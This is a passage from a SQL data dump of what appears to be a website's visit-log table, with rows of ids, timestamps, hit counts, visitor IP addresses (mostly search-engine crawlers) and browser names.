1,1,0,0,'37.48.42.122','chrome'),(97061,1490992531,1,1,0,0,'85.30.248.79','msie'),(97062,1490992764,1,1,0,0,'8.29.198.25','other'),(97063,1490993936,1,1,0,0,'163.172.71.90','other'),(97064,1490996104,1,1,0,0,'163.172.64.192','other'),(97065,1490996134,1,1,0,0,'157.55.39.74','other'),(97066,1490996450,1,0,1,0,'66.249.76.89',''),(97067,1490996993,1,1,0,0,'46.211.65.255','chrome'),(97068,1490999301,1,0,1,0,'66.249.76.89',''),(97069,1491000201,1,1,0,0,'51.255.65.8','other'),(97070,1491000534,1,0,1,0,'66.249.76.91',''),(97071,1491003207,1,1,0,0,'51.255.65.3','other'),(97072,1491003375,1,1,0,0,'51.255.65.23','other'),(97073,1491003599,1,1,0,0,'8.29.198.27','other'),(97074,1491004870,1,1,0,0,'51.255.65.84','other'),(97075,1491006252,1,1,0,0,'141.8.183.1','other'),(97076,1491006253,1,1,0,0,'207.46.13.22','other'),(97077,1491006350,1,1,0,0,'207.46.13.23','other'),(97078,1491007153,1,1,0,0,'51.255.65.57','other'),(97079,1491007533,1,0,1,0,'207.46.13.22',''),(97080,1491008576,1,1,0,0,'51.255.65.81','other'),(97081,1491008812,1,0,1,0,'40.77.167.68',''),(97082,1491009002,1,1,0,0,'163.172.64.254','other'),(97083,1491009937,1,1,0,0,'164.132.161.46','other'),(97084,1491010129,1,1,0,0,'95.108.213.7','other'),(97085,1491010412,1,0,1,0,'66.249.76.107',''),(97086,1491010967,1,0,1,0,'66.249.66.84',''),(97087,1491011020,1,0,1,0,'66.249.66.87',''),(97088,1491011104,1,1,0,0,'164.132.161.11','other'),(97089,1491011146,1,1,0,0,'163.172.64.244','other'),(97090,1491011718,1,1,0,0,'164.132.161.30','other'),(97091,1491012473,1,1,0,0,'51.255.65.94','other'),(97092,1491013397,1,1,0,0,'51.255.65.59','other'),(97093,1491014093,1,1,0,0,'51.255.65.76','other'),(97094,1491014183,1,0,1,0,'66.249.76.109',''),(97095,1491014427,1,1,0,0,'8.29.198.27','other'),(97096,1491017120,1,0,1,0,'66.249.76.89',''),(97097,1491018409,1,1,0,0,'51.255.65.93','other'),(97098,1491018466,1,1,0,0,'51.255.65.42','other'),(97099,1491018475,1,0,1,0,'66.249.66.99',''),(97100,1491018640,1,1,0,0,'163.172.64.220','other'),(97101,1491019447,1,1,0,0,'51.255.65.79','other'),(97102,1491020761,1,1,0,0,'163.172.52.168','chrome'),(97103,1491021053,1,0,1,0,'66.249.66.180',''),(97104,1491021848,1,0,1,0,'66.249.76.91',''),(97105,1491022229,1,1,0,0,'51.255.65.66','other'),(97106,1491024141,1,1,0,0,'164.132.161.2','other'),(97107,1491025250,1,1,0,0,'8.29.198.25','other'),(97108,1491025499,1,1,0,0,'51.255.65.74','other'),(97109,1491026336,1,1,0,0,'157.55.39.93','other'),(97110,1491026593,1,1,0,0,'164.132.161.81','other'),(97111,1491027152,1,1,0,0,'164.132.161.74','other'),(97112,1491027163,1,1,0,0,'164.132.161.77','other'),(97113,1491027257,1,1,0,0,'164.132.161.75','other'),(97114,1491027274,1,1,0,0,'164.132.161.62','other'),(97115,1491027283,1,0,1,0,'66.249.76.109',''),(97116,1491027392,1,1,0,0,'37.204.200.181','opera'),(97117,1491027869,1,0,1,0,'66.249.76.108',''),(97118,1491028951,1,1,0,0,'51.255.65.19','other'),(97119,1491029063,1,1,0,0,'51.255.65.38','other'),(97120,1491029108,1,0,1,0,'66.249.76.108',''),(97121,1491030120,1,1,0,0,'163.172.64.235','other'),(97122,1491030600,1,1,0,0,'51.255.65.22','other'),(97123,1491030653,1,1,0,0,'51.255.65.63','other'),(97124,1491030772,1,1,0,0,'164.132.161.47','other'),(97125,1491031090,1,1,0,0,'164.132.161.28','other'),(97126,1491031271,1,1,0,0,'66.102.9.29','chrome'),(97127,1491031387,1,0,1,0,'66.249.76.91',''),(97128,1491032156,1,1,0,0,'178.154.200.2','other'),(97129,1491032161,1,1,0,0,'178.154.149.3','other'),(97130,1491032516,1,1,0,0,'46.48.13.161','chrome'),(97131,1491032901,1,0,1,0,'66.249.66.180',''),(97132,1491034030,1,0,1,0,'66.249.76.107',''),(97133,1491034678,1,1,0,0,'66.102.9.35','chrome'),(97134,1491035272,1,1,0,0,'66.249.76.89','chrome'),(97135,1491035293,1,1,0,0,'66.249.76.107','chrome'),(97136,1491035455,1,0,1,0,'66.249.76.108',''),(97137,1491035541,1,0,1,0,'66.249.76.109',''),(97138,1491035697,1,1,0,0,'164.132.161.15','other'),(97139,1491036073,1,1,0,0,'8.29.198.27','other'),(97140,1491036649,1,1,0,0,'51.255.65.22','other'),(97141,1491037533,1,1,0,0,'51.255.65.95','other'),(97142,1491038352,2,2,0,0,'95.213.141.126','opera'),(97143,1491038534,1,1,0,0,'164.132.161.87','other'),(97144,1491038566,1,1,0,0,'164.132.161.63','other'),(97145,1491038619,1,1,0,0,'163.172.64.249','other'),(97146,1491038916,1,1,0,0,'66.249.76.91','chrome'),(97147,1491039534,1,1,0,0,'164.132.161.62','other'),(97148,1491039642,1,1,0,0,'163.172.64.253','other'),(97149,1491040134,1,0,1,0,'66.249.66.87',''),(97150,1491040628,1,0,1,0,'66.249.76.108',''),(97151,1491041178,1,1,0,0,'163.172.52.168','chrome'),(97152,1491042086,1,1,0,0,'163.172.64.193','other'),(97153,1491042116,1,1,0,0,'193.194.127.217','firefox'),(97154,1491042629,1,1,0,0,'51.255.65.28','other'),(97155,1491042845,1,0,1,0,'66.249.66.84',''),(97156,1491043668,1,0,1,0,'66.249.66.180',''),(97157,1491044367,1,1,0,0,'51.255.65.37','other'),(97158,1491044548,1,1,0,0,'164.132.161.3','other'),(97159,1491044593,1,0,1,0,'207.46.13.22',''),(97160,1491044630,1,1,0,0,'163.172.64.189','other'),(97161,1491045091,1,0,1,0,'66.249.66.84',''),(97162,1491045201,1,0,1,0,'66.249.76.107',''),(97163,1491045597,1,1,0,0,'164.132.161.84','other'),(97164,1491045678,1,1,0,0,'51.255.65.34','other'),(97165,1491045753,2,1,1,0,'66.249.76.93',''),(97166,1491046083,1,1,0,0,'157.55.39.93','other'),(97167,1491046157,1,0,1,0,'66.249.66.183',''),(97168,1491046591,1,1,0,0,'164.132.161.12','other'),(97169,1491046905,1,1,0,0,'8.29.198.26','other'),(97170,1491047498,1,1,0,0,'51.255.65.69','other'),(97171,1491047659,1,1,0,0,'66.249.93.204','chrome'),(97172,1491047847,1,0,1,0,'207.46.13.23',''),(97173,1491047966,10,10,0,0,'163.172.32.175','other'),(97174,1491048334,1,0,1,0,'66.249.66.177',''),(97175,1491048358,1,1,0,0,'51.255.65.54','other'),(97176,1491048645,1,1,0,0,'163.172.68.136','other'),(97177,1491051410,1,1,0,0,'204.79.180.97','msie'),(97178,1491052906,1,1,0,0,'207.46.13.22','other'),(97179,1491053057,1,1,0,0,'178.92.8.213','firefox'),(97180,1491053927,1,1,0,0,'207.46.13.22','other'),(97181,1491054150,1,1,0,0,'51.255.65.22','other'),(97182,1491054867,1,1,0,0,'163.172.64.179','other'),(97183,1491055242,1,1,0,0,'164.132.161.16','other'),(97184,1491055522,1,0,1,0,'40.77.167.19',''),(97185,1491055675,1,1,0,0,'180.76.15.153','other'),(97186,1491055709,1,0,1,0,'66.249.76.108',''),(97187,1491056112,1,1,0,0,'51.255.65.55','other'),(97188,1491056200,1,1,0,0,'164.132.161.88','other'),(97189,1491056466,1,1,0,0,'163.172.64.232','other'),(97190,1491056924,1,1,0,0,'51.255.65.20','other'),(97191,1491057050,1,1,0,0,'31.42.125.146','chrome'),(97192,1491057253,1,0,1,0,'66.249.76.89',''),(97193,1491057351,1,1,0,0,'141.8.142.164','other'),(97194,1491057471,1,1,0,0,'51.255.65.15','other'),(97195,1491057740,1,1,0,0,'8.29.198.27','other'),(97196,1491058147,1,1,0,0,'164.132.161.77','other'),(97197,1491058239,1,1,0,0,'51.255.65.45','other'),(97198,1491058759,1,1,0,0,'163.172.64.242','other'),(97199,1491059019,1,1,0,0,'51.255.65.9','other'),(97200,1491059341,1,0,1,0,'66.249.66.177',''),(97201,1491060139,1,1,0,0,'51.255.65.13','other'),(97202,1491060232,1,1,0,0,'51.255.65.45','other'),(97203,1491060400,1,1,0,0,'164.132.161.7','other'),(97204,1491060536,1,1,0,0,'51.255.65.93','other'),(97205,1491060620,1,0,1,0,'66.249.76.89',''),(97206,1491060828,1,1,0,0,'164.132.161.25','other'),(97207,1491060864,1,0,1,0,'66.249.66.177',''),(97208,1491061021,1,1,0,0,'164.132.161.94','other'),(97209,1491061323,1,0,1,0,'66.249.76.91',''),(97210,1491061926,1,1,0,0,'164.132.161.34','other'),(97211,1491062732,1,1,0,0,'163.172.64.199','other'),(97212,1491063078,1,1,0,0,'51.255.65.55','other'),(97213,1491063144,1,0,1,0,'66.249.76.108',''),(97214,1491063551,1,1,0,0,'207.46.13.23','other'),(97215,1491064383,1,1,0,0,'66.249.76.91','chrome'),(97216,1491064750,1,1,0,0,'163.172.73.28','other'),(97217,1491066113,1,1,0,0,'163.172.64.185','other'),(97218,1491067055,1,1,0,0,'51.255.65.17','other'),(97219,1491067167,1,1,0,0,'51.255.65.3','other'),(97220,1491067371,1,0,1,0,'66.249.76.93',''),(97221,1491067532,1,0,1,0,'66.249.76.89',''),(97222,1491067626,1,1,0,0,'52.86.176.3','other'),(97223,1491068044,1,1,0,0,'51.255.65.27','other'),(97224,1491068540,1,1,0,0,'51.255.65.4','other'),(97225,1491068576,1,1,0,0,'8.29.198.25','other'),(97226,1491069136,1,1,0,0,'37.53.111.245','firefox'),(97227,1491069815,1,1,0,0,'52.86.176.3','other'),(97228,1491070135,1,1,0,0,'51.255.65.70','other'),(97229,1491070427,1,1,0,0,'51.255.65.16','other'),(97230,1491070574,1,1,0,0,'51.255.65.84','other'),(97231,1491072032,1,1,0,0,'163.172.108.151','chrome'),(97232,1491072229,1,1,0,0,'91.209.11.236','other'),(97233,1491072430,1,1,0,0,'51.255.65.44','other'),(97234,1491072870,1,1,0,0,'51.255.65.9','other'),(97235,1491073005,1,0,1,0,'66.249.76.89',''),(97236,1491073596,1,1,0,0,'163.172.64.216','other'),(97237,1491074317,1,1,0,0,'52.86.176.3','other'),(97238,1491074446,1,0,1,0,'66.249.66.84',''),(97239,1491074638,1,1,0,0,'180.76.15.162','other'),(97240,1491075195,1,0,1,0,'66.249.66.87',''),(97241,1491075389,2,0,2,0,'66.249.76.107',''),(97242,1491075794,1,1,0,0,'163.172.64.216','other'),(97243,1491077005,1,1,0,0,'164.132.161.52','other'),(97244,1491077665,2,2,0,0,'94.25.231.226','chrome'),(97245,1491077960,1,1,0,0,'164.132.161.66','other'),(97246,1491078085,1,1,0,0,'91.196.178.161','chrome'),(97247,1491078647,1,1,0,0,'51.255.65.86','other'),(97248,1491079280,1,1,0,0,'91.196.178.68','chrome'),(97249,1491079314,1,1,0,0,'164.132.161.3','other'),(97250,1491079406,1,1,0,0,'8.29.198.27','other'),(97251,1491081822,1,0,1,0,'66.249.66.180',''),(97252,1491082044,1,1,0,0,'163.172.64.252','other'),(97253,1491082362,1,0,1,0,'157.55.39.93',''),(97254,1491083881,1,0,1,0,'66.249.76.91',''),(97255,1491084780,1,1,0,0,'51.255.65.5','other'),(97256,1491086639,1,0,1,0,'207.46.13.23',''),(97257,1491086762,1,1,0,0,'51.255.65.47','other'),(97258,1491087152,1,1,0,0,'163.172.64.254','other'),(97259,1491087671,1,0,1,0,'66.249.66.177',''),(97260,1491087745,1,1,0,0,'164.132.161.52','other'),(97261,1491087819,1,1,0,0,'164.132.161.20','other'),(97262,1491088345,1,1,0,0,'164.132.161.67','other'),(97263,1491088517,1,0,1,0,'66.249.76.108',''),(97264,1491089059,1,1,0,0,'163.172.64.252','other'),(97265,1491089455,1,0,1,0,'66.249.76.89',''),(97266,1491089769,1,1,0,0,'164.132.161.92','other'),(97267,1491090007,1,1,0,0,'51.255.65.95','other'),(97268,1491090244,1,1,0,0,'8.29.198.26','other'),(97269,1491091072,1,1,0,0,'51.255.65.84','other'),(97270,1491091705,1,1,0,0,'164.132.161.51','other'),(97271,1491092384,1,0,1,0,'66.249.66.183',''),(97272,1491093623,1,1,0,0,'51.255.65.84','other'),(97273,1491094212,1,1,0,0,'66.102.9.25','chrome'),(97274,1491094278,1,1,0,0,'164.132.161.60','other'),(97275,1491095469,1,1,0,0,'51.255.65.43','other'),(97276,1491095785,1,1,0,0,'66.249.76.91','chrome'),(97277,1491095787,1,1,0,0,'66.249.76.107','chrome'),(97278,1491095872,1,0,1,0,'66.249.66.183',''),(97279,1491096150,2,2,0,0,'40.77.167.123','other'),(97280,1491096181,1,1,0,0,'5.255.253.63','other'),(97281,1491096185,1,1,0,0,'95.108.179.15','other'),(97282,1491096237,1,1,0,0,'164.132.161.67','other'),(97283,1491096348,1,1,0,0,'163.172.71.13','other'),(97284,1491096354,1,1,0,0,'164.132.161.83','other'),(97285,1491097032,2,2,0,0,'40.77.167.108','other'),(97286,1491098035,1,1,0,0,'51.255.65.88','other'),(97287,1491099894,1,1,0,0,'51.255.65.7','other'),(97288,1491101081,1,1,0,0,'8.29.198.26','other'),(97289,1491101294,1,0,1,0,'207.46.13.193',''),(97290,1491102093,1,1,0,0,'51.255.65.43','other'),(97291,1491103842,1,1,0,0,'164.132.161.70','other'),(97292,1491103900,1,1,0,0,'207.46.13.193','other'),(97293,1491104320,1,0,1,0,'66.249.66.87',''),(97294,1491104362,1,0,1,0,'66.249.76.93',''),(97296,1491104958,1,1,0,0,'79.172.193.32','chrome'),(97297,1491105023,1,1,0,0,'66.249.66.183','chrome'),(97298,1491105727,1,1,0,0,'163.172.64.179','other'),(97299,1491106403,1,0,1,0,'66.249.76.108',''),(97300,1491106447,1,1,0,0,'130.180.216.16','chrome'),(97301,1491106692,1,0,1,0,'66.249.66.84',''),(97302,1491106866,1,1,0,0,'164.132.161.40','other'),(97303,1491107579,1,1,0,0,'91.196.178.34','chrome'),(97304,1491108405,1,1,0,0,'164.132.161.58','other'),(97305,1491109636,1,1,0,0,'66.249.76.108','chrome'),(97306,1491109887,1,1,0,0,'164.132.161.45','other'),(97307,1491109961,1,0,1,0,'66.249.76.89',''),(97308,1491110156,1,1,0,0,'163.172.64.231','other'),(97309,1491110257,1,0,1,0,'66.249.66.81',''),(97310,1491110560,1,1,0,0,'51.255.65.48','other'),(97311,1491111161,1,0,1,0,'207.46.13.27',''),(97312,1491111373,1,0,1,0,'66.249.66.183',''),(97313,1491111391,1,1,0,0,'66.249.76.107','chrome'),(97314,1491111602,1,0,1,0,'66.249.76.109',''),(97315,1491111913,1,1,0,0,'8.29.198.27','other'),(97316,1491112015,1,1,0,0,'180.76.15.8','other'),(97317,1491112486,1,1,0,0,'51.255.65.45','other'),(97318,1491112697,1,1,0,0,'163.172.64.193','other'),(97319,1491113950,1,0,1,0,'66.249.76.91',''),(97320,1491114259,1,0,1,0,'66.249.76.109',''),(97321,1491115085,1,1,0,0,'164.132.161.40','other'),(97322,1491115554,1,0,1,0,'40.77.167.123',''),(97323,1491116666,1,1,0,0,'164.132.161.73','other'),(97324,1491118480,1,1,0,0,'93.115.95.205','chrome'),(97325,1491118562,1,1,0,0,'5.255.253.81','other'),(97326,1491118573,2,2,0,0,'95.108.213.7','other'),(97327,1491118577,1,1,0,0,'93.158.152.79','other'),(97328,1491118585,1,1,0,0,'95.108.213.8','other'),(97329,1491118588,1,1,0,0,'37.9.113.38','other'),(97330,1491118592,2,2,0,0,'141.8.142.164','other'),(97331,1491118596,1,1,0,0,'141.8.142.15','other'),(97332,1491118603,1,1,0,0,'141.8.142.38','other'),(97333,1491118606,1,1,0,0,'178.154.149.1','other'),(97334,1491118791,1,0,1,0,'66.249.66.87',''),(97335,1491119214,1,1,0,0,'141.8.142.154','other'),(97336,1491119221,1,1,0,0,'95.108.179.15','other'),(97337,1491119225,1,1,0,0,'5.255.253.63','other'),(97338,1491120292,1,0,1,0,'66.249.66.183',''),(97339,1491121055,1,1,0,0,'163.172.108.151','chrome'),(97340,1491121138,1,0,1,0,'66.249.76.107',''),(97341,1491121154,2,2,0,0,'66.249.76.108','chrome'),(97342,1491121345,1,0,1,0,'207.46.13.27',''),(97343,1491121403,1,0,1,0,'66.249.76.91',''),(97344,1491122212,1,1,0,0,'51.255.65.17','other'),(97345,1491122748,1,1,0,0,'8.29.198.27','other'),(97346,1491122931,1,1,0,0,'164.132.161.34','other'),(97347,1491123112,1,1,0,0,'164.132.161.47','other'),(97348,1491123360,1,1,0,0,'163.172.64.250','other'),(97349,1491123421,1,1,0,0,'164.132.161.5','other'),(97350,1491123799,1,1,0,0,'164.132.161.67','other'),(97351,1491124399,1,1,0,0,'51.255.65.8','other'),(97352,1491125075,1,1,0,0,'141.8.142.164','other'),(97353,1491125091,1,1,0,0,'178.154.200.37','other'),(97354,1491125284,1,1,0,0,'51.255.65.24','other'),(97355,1491126782,1,1,0,0,'51.255.65.40','other'),(97356,1491127216,1,1,0,0,'134.249.40.67','firefox'),(97357,1491127574,1,1,0,0,'163.172.64.223','other'),(97358,1491127852,1,1,0,0,'164.132.161.40','other'),(97359,1491129369,1,1,0,0,'51.255.65.33','other'),(97360,1491129631,1,1,0,0,'91.209.11.236','other'),(97361,1491129758,1,1,0,0,'164.132.161.77','other'),(97362,1491131491,1,0,1,0,'66.249.66.81',''),(97363,1491131921,1,0,1,0,'66.249.66.180',''),(97364,1491132814,1,1,0,0,'164.132.161.8','other'),(97365,1491133024,1,1,0,0,'51.255.65.36','other'),(97366,1491133229,2,0,2,0,'66.249.66.81',''),(97367,1491133575,1,1,0,0,'8.29.198.27','other'),(97368,1491134138,1,1,0,0,'66.249.76.109','chrome'),(97369,1491134451,1,0,1,0,'66.249.76.89',''),(97370,1491135648,1,1,0,0,'51.255.65.46','other'),(97371,1491136093,1,1,0,0,'51.255.65.63','other'),(97372,1491136508,1,1,0,0,'204.79.180.20','msie'),(97373,1491137834,1,1,0,0,'37.53.111.245','firefox'),(97374,1491139769,1,1,0,0,'51.255.65.71','other'),(97375,1491140240,1,0,1,0,'66.249.66.87',''),(97376,1491140387,1,1,0,0,'163.172.64.232','other'),(97377,1491141275,1,0,1,0,'207.46.13.215',''),(97378,1491142897,1,0,1,0,'66.249.76.109',''),(97379,1491143404,1,1,0,0,'180.76.15.143','other'),(97380,1491143480,1,1,0,0,'164.132.161.84','other'),(97381,1491143496,1,1,0,0,'37.52.22.39','chrome'),(97382,1491143553,1,1,0,0,'163.172.68.118','other'),(97383,1491143683,1,1,0,0,'66.249.93.89','chrome'),(97384,1491143794,1,0,1,0,'66.249.76.89',''),(97385,1491143906,1,1,0,0,'164.132.161.92','other'),(97386,1491143934,1,1,0,0,'164.132.161.63','other'),(97387,1491143939,3,3,0,0,'91.209.11.236','other'),(97388,1491143981,1,1,0,0,'163.172.71.21','other'),(97389,1491144064,1,1,0,0,'164.132.161.61','other'),(97390,1491144077,1,1,0,0,'51.255.65.25','other'),(97391,1491144152,1,1,0,0,'207.46.13.215','other'),(97392,1491144342,1,1,0,0,'163.172.64.186','other'),(97393,1491144417,1,1,0,0,'8.29.198.25','other'),(97394,1491144537,1,0,1,0,'66.249.76.93',''),(97395,1491144769,1,1,0,0,'66.249.76.109','chrome'),(97396,1491145120,1,0,1,0,'66.249.66.180',''),(97397,1491145373,1,0,1,0,'66.249.76.108',''),(97398,1491145419,1,1,0,0,'51.255.65.60','other'),(97399,1491145493,1,1,0,0,'164.132.161.85','other'),(97400,1491145878,1,0,1,0,'66.249.76.107',''),(97401,1491146281,1,1,0,0,'51.255.65.28','other'),(97402,1491146442,1,1,0,0,'207.46.13.125','other'),(97403,1491146917,1,1,0,0,'163.172.64.238','other'),(97404,1491147404,1,1,0,0,'180.76.15.141','other'),(97405,1491147450,1,1,0,0,'51.255.65.81','other'),(97406,1491148353,1,1,0,0,'5.58.93.79','firefox'),(97407,1491148372,1,1,0,0,'91.196.178.35','firefox'),(97408,1491148443,1,1,0,0,'95.132.45.63','chrome'),(97409,1491148734,1,1,0,0,'91.196.178.34','chrome'),(97410,1491149048,1,1,0,0,'40.77.167.116','other'),(97411,1491149906,1,1,0,0,'180.76.15.149','other'),(97412,1491150171,1,1,0,0,'51.255.65.55','other'),(97413,1491150285,3,3,0,0,'40.77.167.116','other'),(97414,1491150626,1,1,0,0,'51.255.65.43','other'),(97415,1491150689,1,0,1,0,'66.249.76.93',''),(97416,1491150931,1,1,0,0,'207.46.13.215','other'),(97417,1491151030,1,1,0,0,'51.255.65.22','other'),(97418,1491151370,2,2,0,0,'40.77.167.116','other'),(97419,1491151546,1,1,0,0,'37.53.225.225','firefox'),(97420,1491152141,1,1,0,0,'91.221.75.84','chrome'),(97421,1491152196,1,1,0,0,'163.172.64.191','other'),(97422,1491153224,1,1,0,0,'66.249.76.107','chrome'),(97423,1491153406,1,1,0,0,'164.132.161.78','other'),(97424,1491153635,4,4,0,0,'173.234.159.250','other'),(97425,1491153895,1,0,1,0,'66.249.76.89',''),(97426,1491154230,1,1,0,0,'164.132.161.76','other'),(97427,1491154346,1,1,0,0,'51.255.65.28','other'),(97428,1491155248,1,1,0,0,'8.29.198.27','other'),(97429,1491155272,1,0,1,0,'66.249.76.108',''),(97430,1491155340,1,1,0,0,'51.255.65.13','other'),(97431,1491156430,1,1,0,0,'163.172.64.223','other'),(97432,1491157028,1,1,0,0,'164.132.161.19','other'),(97433,1491157717,1,1,0,0,'91.196.178.131','chrome'),(97434,1491158531,1,1,0,0,'51.255.65.83','other'),(97435,1491158659,1,1,0,0,'51.255.65.12','other'),(97436,1491159365,1,1,0,0,'51.255.65.28','other'),(97437,1491159673,1,1,0,0,'164.132.161.96','other'),(97438,1491159817,1,0,1,0,'66.249.76.89',''),(97439,1491160327,1,1,0,0,'130.180.208.75','chrome'),(97440,1491160442,1,1,0,0,'51.255.65.7','other'),(97441,1491160596,7,7,0,0,'46.229.168.68','other'),(97442,1491160615,2,2,0,0,'46.229.168.75','other'),(97443,1491160625,5,5,0,0,'46.229.168.67','other'),(97444,1491160663,1,1,0,0,'46.229.168.72','other'),(97445,1491160691,5,5,0,0,'46.229.168.71','other'),(97446,1491160710,1,1,0,0,'66.249.66.183','chrome'),(97447,1491160721,5,5,0,0,'46.229.168.66','other'),(97448,1491160774,5,5,0,0,'46.229.168.74','other'),(97449,1491160784,7,7,0,0,'46.229.168.73','other'),(97450,1491160811,4,4,0,0,'46.229.168.69','other'),(97451,1491160924,2,2,0,0,'46.229.168.70','other'),(97452,1491161019,1,1,0,0,'164.132.161.90','other'),(97453,1491161129,1,1,0,0,'91.226.34.19','other'),(97454,1491161438,1,1,0,0,'51.255.65.50','other'),(97455,1491161522,1,1,0,0,'51.255.65.66','other'),(97456,1491161635,1,1,0,0,'163.172.64.192','other'),(97457,1491161719,1,1,0,0,'164.132.161.94','other'),(97458,1491162365,1,1,0,0,'164.132.161.67','other'),(97459,1491162462,1,1,0,0,'130.180.208.75','chrome'),(97460,1491162500,1,0,1,0,'66.249.76.108',''),(97461,1491162754,1,1,0,0,'164.132.161.76','other'),(97462,1491162857,1,1,0,0,'66.102.9.38','chrome'),(97463,1491162926,1,0,1,0,'66.249.76.107',''),(97464,1491162927,1,1,0,0,'2.90.205.15','firefox'),(97465,1491163637,1,0,1,0,'66.249.66.183',''),(97466,1491163725,1,1,0,0,'164.132.161.93','other'),(97467,1491164167,1,1,0,0,'66.249.76.93','chrome'),(97468,1491164926,1,1,0,0,'207.46.13.125','other'),(97469,1491165409,1,0,1,0,'66.249.66.177',''),(97470,1491166081,1,1,0,0,'8.29.198.27','other'),(97471,1491166883,1,1,0,0,'51.255.65.73','other'),(97472,1491166988,2,0,2,0,'66.249.76.109',''),(97473,1491167207,1,1,0,0,'163.172.64.222','other'),(97474,1491167756,1,1,0,0,'40.77.167.135','other'),(97475,1491168913,2,0,2,0,'66.249.76.91',''),(97476,1491168932,1,1,0,0,'164.132.161.94','other'),(97477,1491169239,1,1,0,0,'164.132.161.63','other'),(97478,1491170170,1,1,0,0,'51.255.65.11','other'),(97479,1491170198,1,1,0,0,'51.255.65.76','other'),(97480,1491172815,1,1,0,0,'51.255.65.27','other'),(97481,1491173282,1,0,1,0,'66.249.66.87',''),(97482,1491173697,1,1,0,0,'95.108.179.15','other'),(97483,1491173901,1,1,0,0,'164.132.161.89','other'),(97484,1491174355,1,1,0,0,'51.255.65.10','other'),(97485,1491174561,1,1,0,0,'163.172.64.189','other'),(97486,1491175407,1,1,0,0,'163.172.64.227','other'),(97487,1491175566,1,1,0,0,'40.77.167.135','other'),(97488,1491176556,1,1,0,0,'51.255.65.10','other'),(97489,1491176911,1,1,0,0,'8.29.198.27','other'),(97490,1491177447,1,1,0,0,'163.172.64.182','other'),(97491,1491178597,1,1,0,0,'66.249.76.109','chrome'),(97492,1491179737,1,1,0,0,'164.132.161.64','other'),(97493,1491180032,1,1,0,0,'141.8.142.154','other'),(97494,1491180116,1,1,0,0,'5.255.253.4','other'),(97495,1491180416,1,1,0,0,'180.76.15.139','other'),(97496,1491180432,17,17,0,0,'95.158.189.118','other'),(97497,1491181030,1,0,1,0,'66.249.76.89',''),(97498,1491182329,1,1,0,0,'164.132.161.25','other'),(97499,1491182394,1,1,0,0,'51.255.65.52','other'),(97500,1491182656,1,1,0,0,'66.249.76.107','chrome'),(97501,1491183316,1,1,0,0,'40.77.167.23','other'),(97502,1491183410,1,0,1,0,'66.249.66.177',''),(97503,1491183524,1,1,0,0,'163.172.64.253','other'),(97504,1491183568,1,0,1,0,'66.249.76.109',''),(97505,1491183706,1,0,1,0,'66.249.76.107',''),(97506,1491184190,1,1,0,0,'94.25.231.20','chrome'),(97507,1491184194,1,1,0,0,'94.25.231.20','firefox'),(97508,1491185370,1,0,1,0,'66.249.76.107',''),(97509,1491186030,1,1,0,0,'163.172.71.29','other'),(97510,1491186159,1,1,0,0,'163.172.64.247','other'),(97511,1491186280,1,1,0,0,'163.172.64.246','other'),(97512,1491186357,2,2,0,0,'66.249.76.89','chrome'),(97513,1491186492,2,2,0,0,'94.25.231.20','firefox'),(97514,1491186648,1,1,0,0,'164.132.161.80','other'),(97515,1491186676,1,1,0,0,'52.86.176.3','other'),(97516,1491186757,1,1,0,0,'164.132.161.77','other'),(97517,1491186881,1,0,1,0,'66.249.76.91',''),(97518,1491186955,1,1,0,0,'164.132.161.72','other'),(97519,1491187748,1,1,0,0,'8.29.198.27','other'),(97520,1491187812,2,1,1,0,'66.249.76.91',''),(97521,1491187817,2,1,1,0,'66.249.76.109',''),(97522,1491188858,1,1,0,0,'91.209.11.236','other'),(97523,1491189696,1,0,1,0,'66.249.76.93',''),(97524,1491189790,1,1,0,0,'91.209.11.236','other'),(97525,1491190189,1,1,0,0,'40.77.167.5','other'),(97526,1491190216,1,1,0,0,'66.249.66.81','chrome'),(97527,1491190320,1,1,0,0,'66.249.76.91','chrome'),(97528,1491190438,1,1,0,0,'91.196.178.37','chrome'),(97529,1491190867,1,0,1,0,'66.249.76.107',''),(97530,1491190880,1,0,1,0,'66.249.76.108',''),(97531,1491191742,1,0,1,0,'66.249.76.91',''),(97532,1491191876,1,0,1,0,'66.249.76.108',''),(97533,1491192011,1,1,0,0,'66.249.76.89','chrome'),(97534,1491193349,1,0,1,0,'66.249.66.84',''),(97535,1491194712,1,0,1,0,'66.249.66.81',''),(97536,1491194910,1,1,0,0,'91.196.178.69','firefox'),(97537,1491195451,1,1,0,0,'164.132.161.10','other'),(97538,1491196281,1,1,0,0,'66.249.76.108','chrome'),(97539,1491196325,2,0,2,0,'66.249.66.84',''),(97540,1491196472,1,1,0,0,'164.132.161.78','other'),(97541,1491196670,1,1,0,0,'51.255.65.83','other'),(97542,1491196746,1,1,0,0,'163.172.64.233','other'),(97543,1491196753,1,0,1,0,'66.249.76.89',''),(97544,1491197346,1,1,0,0,'66.102.9.25','chrome'),(97545,1491197575,1,1,0,0,'51.255.65.51','other'),(97546,1491197793,1,0,1,0,'66.249.76.107',''),(97547,1491197833,1,1,0,0,'163.172.68.132','other'),(97548,1491198584,1,1,0,0,'8.29.198.27','other'),(97549,1491198630,1,0,1,0,'68.180.229.231',''),(97550,1491199424,1,1,0,0,'5.58.93.79','opera'),(97551,1491199467,1,0,1,0,'66.249.76.89',''),(97552,1491200188,1,1,0,0,'163.172.64.230','other'),(97553,1491200246,1,1,0,0,'51.255.65.95','other'),(97554,1491200585,1,1,0,0,'91.196.178.66','firefox'),(97555,1491200703,1,0,1,0,'66.249.66.180',''),(97556,1491200800,1,1,0,0,'51.255.65.82','other'),(97557,1491200865,1,0,1,0,'66.249.66.81',''),(97558,1491201279,1,1,0,0,'164.132.161.33','other'),(97559,1491201337,1,1,0,0,'40.77.167.135','other'),(97560,1491201394,1,1,0,0,'164.132.161.60','other'),(97561,1491201448,1,1,0,0,'163.172.73.28','other'),(97562,1491201593,64,64,0,0,'64.140.169.42','firefox'),(97563,1491201645,1,1,0,0,'91.196.178.69','chrome'),(97564,1491203696,1,1,0,0,'164.132.161.75','other'),(97565,1491204227,1,1,0,0,'91.196.178.129','chrome'),(97566,1491204304,2,2,0,0,'91.196.177.26','chrome'),(97567,1491204528,1,1,0,0,'91.196.178.69','chrome'),(97568,1491204624,1,1,0,0,'91.196.178.65','chrome'),(97569,1491205574,1,0,1,0,'66.249.76.109',''),(97570,1491205617,1,1,0,0,'93.74.212.147','firefox'),(97571,1491206163,2,2,0,0,'91.124.5.33','chrome'),(97572,1491206623,1,1,0,0,'91.196.178.131','other'),(97573,1491206697,1,1,0,0,'164.132.161.61','other'),(97574,1491206886,1,1,0,0,'91.196.178.134','firefox'),(97575,1491207144,1,1,0,0,'51.255.65.33','other'),(97576,1491207938,1,0,1,0,'66.249.66.180',''),(97577,1491208359,